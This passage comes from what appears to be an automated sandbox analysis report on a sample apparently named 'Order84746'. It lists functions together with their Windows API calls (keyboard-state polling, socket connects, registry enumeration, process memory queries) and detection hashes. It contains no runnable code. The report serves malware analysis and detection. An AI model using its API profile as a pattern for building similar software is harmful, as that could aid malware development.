                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009419F3
                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00941A26
                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00941B49
                          • CloseHandle.KERNEL32(?), ref: 00941BBF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                          • String ID:
                          • API String ID: 2364364464-0
                          • Opcode ID: aa10a8fcededfec4e6e15c681f359e470c02f844c43e0b6d8f477eb5e609feed
                          • Instruction ID: ae09b2b1104f6f6762d6c4219d4641d36de1ede715b664986f28a649b374a119
                          • Opcode Fuzzy Hash: aa10a8fcededfec4e6e15c681f359e470c02f844c43e0b6d8f477eb5e609feed
                          • Instruction Fuzzy Hash: 14815F70600214EBDF109F68C896BADBBE9FF48720F148459FA15AF3C2D7B5E9418B91
                          Function 00921C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00921CB4
                          • VariantClear.OLEAUT32(00000013), ref: 00921D26
                          • VariantClear.OLEAUT32(00000000), ref: 00921D81
                          • VariantClear.OLEAUT32(?), ref: 00921DF8
                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00921E26
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Variant$Clear$ChangeInitType
                          • String ID:
                          • API String ID: 4136290138-0
                          • Opcode ID: 426708a33807d7f83f93198a0a27056ae79779102fa4e1b50bf2a444e7457490
                          • Instruction ID: cfade53a929c2289537b6d5043fc27dc461ce8bd726c7c6022249ce1d3e3b1d3
                          • Opcode Fuzzy Hash: 426708a33807d7f83f93198a0a27056ae79779102fa4e1b50bf2a444e7457490
                          • Instruction Fuzzy Hash: 225177B5A00219EFCB14CF58D880AAAB7B8FF8C314B158559ED59DB354E730EA51CFA0
                          Function 00940688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008E936C: __swprintf.LIBCMT ref: 008E93AB
                            • Part of subcall function 008E936C: __itow.LIBCMT ref: 008E93DF
                          • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 009406EE
                          • GetProcAddress.KERNEL32(00000000,?), ref: 0094077D
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0094079B
                          • GetProcAddress.KERNEL32(00000000,?), ref: 009407E1
                          • FreeLibrary.KERNEL32(00000000,00000004), ref: 009407FB
                            • Part of subcall function 008FE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0092A574,?,?,00000000,00000008), ref: 008FE675
                            • Part of subcall function 008FE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0092A574,?,?,00000000,00000008), ref: 008FE699
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                          • String ID:
                          • API String ID: 327935632-0
                          • Opcode ID: b31d787bf5a47b40f0259cc84534ec19ce98a1914e823de9357a278f2c4da1ab
                          • Instruction ID: a852f9d62a48b59152fcf6103c9ac7624589b7b4b4e3bf778c6b8287e305100a
                          • Opcode Fuzzy Hash: b31d787bf5a47b40f0259cc84534ec19ce98a1914e823de9357a278f2c4da1ab
                          • Instruction Fuzzy Hash: 16516975A00249DFCB00EFA8C981DADB7B5FF99310B058059EA15EB352DB74ED46CB82
                          Function 00942E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00943C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00942BB5,?,?), ref: 00943C1D
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00942EEF
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00942F2E
                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00942F75
                          • RegCloseKey.ADVAPI32(?,?), ref: 00942FA1
                          • RegCloseKey.ADVAPI32(00000000), ref: 00942FAE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                          • String ID:
                          • API String ID: 3740051246-0
                          • Opcode ID: 8d81a930bba919674cafbfb0f675c664c240e892ad647b58df35bd82f8b727d7
                          • Instruction ID: ea4e236dac698fcd0b6a95774501cdee94906fdc6022df3fa0bfa1d9a10edb94
                          • Opcode Fuzzy Hash: 8d81a930bba919674cafbfb0f675c664c240e892ad647b58df35bd82f8b727d7
                          • Instruction Fuzzy Hash: 34517871608244AFD704EF68CC81E6ABBF8FF89314F80885DF595972A1DB70E909DB52
                          Function 00938DE2 Relevance: 7.6, APIs: 5, Instructions: 136networkCOMMON
                          Download Yara Rule
                          APIs
                          • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00938E7C
                          • WSAGetLastError.WS2_32(00000000), ref: 00938E89
                          • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00938EAD
                          • _strlen.LIBCMT ref: 00938EF7
                          • WSAGetLastError.WS2_32(00000000), ref: 00938F6A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorLast$_strlenselect
                          • String ID:
                          • API String ID: 2217125717-0
                          • Opcode ID: ddbbbcaf8aa4fed0a50a03849979ad9958fbe674059c613121e686b1a4673b7f
                          • Instruction ID: 22d40f3b46d0729c7226a7cb766e5193a70d357243cbece8d901ef173792da89
                          • Opcode Fuzzy Hash: ddbbbcaf8aa4fed0a50a03849979ad9958fbe674059c613121e686b1a4673b7f
                          • Instruction Fuzzy Hash: D941C071A00204AFCB14EBA9DD85EAEB7BEEF48310F104659F11AD7291DF70AE04CB61
                          Function 0094CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 569f158a5e46c6465ec0cc7d076658d0a18ad0750f9836edfd8a2f5818f51b4d
                          • Instruction ID: bb87efa8cb2eee3242c45dc5d5d8bab76c54bc80ca5ae0ce0f2910c39948274f
                          • Opcode Fuzzy Hash: 569f158a5e46c6465ec0cc7d076658d0a18ad0750f9836edfd8a2f5818f51b4d
                          • Instruction Fuzzy Hash: F641C6B9E06214AFC760DF68CC44FAABF6CEB09350F140265F969E72E1C774AD01DA90
                          Function 00931206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                          Download Yara Rule
                          APIs
                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009312B4
                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 009312DD
                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0093131C
                            • Part of subcall function 008E936C: __swprintf.LIBCMT ref: 008E93AB
                            • Part of subcall function 008E936C: __itow.LIBCMT ref: 008E93DF
                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00931341
                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00931349
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                          • String ID:
                          • API String ID: 1389676194-0
                          • Opcode ID: e0e6c53f59b4146e7509a020ae53dbb56e69962b7ed7648c2537e2b96014686c
                          • Instruction ID: 93479cacd8439cbd601b1d8511a3716183458c7e88ecfe55fd27cba26c1995e6
                          • Opcode Fuzzy Hash: e0e6c53f59b4146e7509a020ae53dbb56e69962b7ed7648c2537e2b96014686c
                          • Instruction Fuzzy Hash: 0C411C35A00149DFCB01EF69C9919AEBBF5FF09310B148099E95AAB362CB71ED01DF51
                          Function 008FB63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetCursorPos.USER32(000000FF), ref: 008FB64F
                          • ScreenToClient.USER32(00000000,000000FF), ref: 008FB66C
                          • GetAsyncKeyState.USER32(00000001), ref: 008FB691
                          • GetAsyncKeyState.USER32(00000002), ref: 008FB69F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AsyncState$ClientCursorScreen
                          • String ID:
                          • API String ID: 4210589936-0
                          • Opcode ID: 50cc27c1c45033083e4e5fd4fe879d8bf1fad8fea0a44264f5a06207d5492a48
                          • Instruction ID: e9fb0e30560f2598ded89a3b0470640a5eafd41a343588ae188baa1cb6fb7b0e
                          • Opcode Fuzzy Hash: 50cc27c1c45033083e4e5fd4fe879d8bf1fad8fea0a44264f5a06207d5492a48
                          • Instruction Fuzzy Hash: B3415C31A08119FBDF19DF65CC44AE9BBB4FB19325F204219F829D6290CB34AD94DB91
                          Function 0091B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 0091B369
                          • PostMessageW.USER32(?,00000201,00000001), ref: 0091B413
                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0091B41B
                          • PostMessageW.USER32(?,00000202,00000000), ref: 0091B429
                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0091B431
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessagePostSleep$RectWindow
                          • String ID:
                          • API String ID: 3382505437-0
                          • Opcode ID: fcc992a945fdbefac0836aab632eb6d879e0fdc471da373be6d257756ed76f2e
                          • Instruction ID: d40559137b7db08164410e37e2c2f5b7068e9254e01048e79f16693e5e2c571d
                          • Opcode Fuzzy Hash: fcc992a945fdbefac0836aab632eb6d879e0fdc471da373be6d257756ed76f2e
                          • Instruction Fuzzy Hash: BC31EE71A0521DEBDF04CF68DD4CADE3BBAEB04315F008229F931AA1D1C3B099A1DB90
                          Function 0091DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                          Download Yara Rule
                          APIs
                          • IsWindowVisible.USER32(?), ref: 0091DBD7
                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0091DBF4
                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0091DC2C
                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0091DC52
                          • _wcsstr.LIBCMT ref: 0091DC5C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                          • String ID:
                          • API String ID: 3902887630-0
                          • Opcode ID: 6297d7bef8ddb2a249827a0421c77ee53564386024bd55e8843c15f8ca5a86cd
                          • Instruction ID: 967dd64a0dc8707b4e72e4a751ec0daa846b9c8db30b785978813a32939df12c
                          • Opcode Fuzzy Hash: 6297d7bef8ddb2a249827a0421c77ee53564386024bd55e8843c15f8ca5a86cd
                          • Instruction Fuzzy Hash: B1214931309108BBEB155F39DD49EBB7BACEF45710F104439F909CA091EAA1CC80D2A0
                          Function 00926318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008E50E6: _wcsncpy.LIBCMT ref: 008E50FA
                          • GetFileAttributesW.KERNEL32(?,?,?,?,009260C3), ref: 00926369
                          • GetLastError.KERNEL32(?,?,?,009260C3), ref: 00926374
                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009260C3), ref: 00926388
                          • _wcsrchr.LIBCMT ref: 009263AA
                            • Part of subcall function 00926318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009260C3), ref: 009263E0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                          • String ID:
                          • API String ID: 3633006590-0
                          • Opcode ID: 32c0ca2180790d930ca53e9aac6f341388c74f7c9656f1caea52e12a6dec5487
                          • Instruction ID: b3690e8739f45eb1b32717464f85af0ea22f115e4e5f6f1bddb23e6ceb5019b4
                          • Opcode Fuzzy Hash: 32c0ca2180790d930ca53e9aac6f341388c74f7c9656f1caea52e12a6dec5487
                          • Instruction Fuzzy Hash: 7A210831A152258ADB25EB78BC52FEA33ACFF163A0F100469F155C34C9EBA4D9809A65
                          Function 00938B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0093A82C: inet_addr.WS2_32(00000000), ref: 0093A84E
                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00938BD3
                          • WSAGetLastError.WS2_32(00000000), ref: 00938BE2
                          • connect.WS2_32(00000000,?,00000010), ref: 00938BFE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorLastconnectinet_addrsocket
                          • String ID:
                          • API String ID: 3701255441-0
                          • Opcode ID: 28b7b65e1aa80fed08480152fbfb09c435ee157c77f02165c5993d513dd984cd
                          • Instruction ID: d0c88745be27fa092dae4e4e41797492d679e43894254f4bb8303f89f6259c8c
                          • Opcode Fuzzy Hash: 28b7b65e1aa80fed08480152fbfb09c435ee157c77f02165c5993d513dd984cd
                          • Instruction Fuzzy Hash: FA218E717002149FCB10AF68D985B7E77A9EF48710F044459FA56EB2D2CBB4A8019B62
                          Function 00938420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                          • IsWindow.USER32(00000000), ref: 00938441
                          • GetForegroundWindow.USER32 ref: 00938458
                          • GetDC.USER32(00000000), ref: 00938494
                          • GetPixel.GDI32(00000000,?,00000003), ref: 009384A0
                          • ReleaseDC.USER32(00000000,00000003), ref: 009384DB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$ForegroundPixelRelease
                          • String ID:
                          • API String ID: 4156661090-0
                          • Opcode ID: 9d2b6fd15d81d2afc3d6f5fb201cf5e14838c3fc46e45e90f003ec7ab78e1c48
                          • Instruction ID: 5d698032c4c4e91b096d59ba4be815842f6497b0e00c8dd3173d18991d7ed564
                          • Opcode Fuzzy Hash: 9d2b6fd15d81d2afc3d6f5fb201cf5e14838c3fc46e45e90f003ec7ab78e1c48
                          • Instruction Fuzzy Hash: 3E218176B00204AFD700DFA5DD89AAEBBE5EF48301F048479F95AD7251DB70AC04DB60
                          Function 008FAF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 008FAFE3
                          • SelectObject.GDI32(?,00000000), ref: 008FAFF2
                          • BeginPath.GDI32(?), ref: 008FB009
                          • SelectObject.GDI32(?,00000000), ref: 008FB033
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ObjectSelect$BeginCreatePath
                          • String ID:
                          • API String ID: 3225163088-0
                          • Opcode ID: a2bbbd15867120026c478d543da1d955743d02d951c3d6a3cd4e388fe40143ca
                          • Instruction ID: f95f4d448e4735dad4c1faa9f989d2d588e4c1ba04be65dad471b2ed8b3ba00c
                          • Opcode Fuzzy Hash: a2bbbd15867120026c478d543da1d955743d02d951c3d6a3cd4e388fe40143ca
                          • Instruction Fuzzy Hash: D621A1B0928609EFDB14DF65EC447AA7B68FB123A9F18421AF524D60E0C7B04945EBD1
                          Function 0090217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                          Download Yara Rule
                          APIs
                          • __calloc_crt.LIBCMT ref: 009021A9
                          • CreateThread.KERNEL32(?,?,009022DF,00000000,?,?), ref: 009021ED
                          • GetLastError.KERNEL32 ref: 009021F7
                          • _free.LIBCMT ref: 00902200
                          • __dosmaperr.LIBCMT ref: 0090220B
                            • Part of subcall function 00907C0E: __getptd_noexit.LIBCMT ref: 00907C0E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
